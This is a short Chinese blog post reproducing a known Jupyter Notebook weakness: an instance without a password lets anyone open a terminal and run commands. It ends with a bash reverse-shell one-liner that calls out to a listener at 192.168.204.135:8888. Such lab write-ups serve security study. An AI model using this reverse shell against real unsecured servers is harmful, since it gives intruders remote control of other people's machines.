热门标签
热门文章
- 1结果公示!400名博硕士获“优秀学位论文”奖!
- 2机械学习—零基础学习日志013(极限值)
- 3探索图神经网络(GNN):使用Python实现你的GNN模型_图神经网络 python
- 4Jetpack Compose 初体验_jetpackcomposetoolbar
- 5使用vscode配置C++工程的debug环境(linux)_vscode c++ debug
- 6测试工程师与AI chatGPT,编写python读取xmind测试用例chatgtp+python+xmind
- 7Flask 运用Echarts绘制图形_flask echarts
- 85行代码快速Git配置ssh
- 9Spark SQL 和 传统 SQL 的区别_sparksql和sql的区别
- 10基于RS422通信的FPGA软件设计第一天_fpga rs422
当前位置: article > 正文
【漏洞复现】Jupyter Notebook未授权访问到RCE_jupyter漏洞
作者:我家小花儿 | 2024-08-06 03:46:49
赞
踩
jupyter漏洞
影响范围
Jupyter Notebook
漏洞简介
Jupyter Notebook(此前被称为IPython notebook)是一个交互式笔记本,支持运行40多种编程语言,Jupyter Notebook的本质是一个Web应用程序,便于创建和共享程序文档,支持实时代码,数学方程,可视化和 markdown,如果管理员未为Jupyter Notebook配置密码将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令
漏洞复现
应用页面如下所示:
在进入面板之后选择"New-Terminal"进入终端
随后可以执行任意命令:
GetShell
随后我们执行一下命令进行反弹shell操作
bash -i >& /dev/tcp/192.168.204.135/8888 0>&1推荐阅读
相关标签
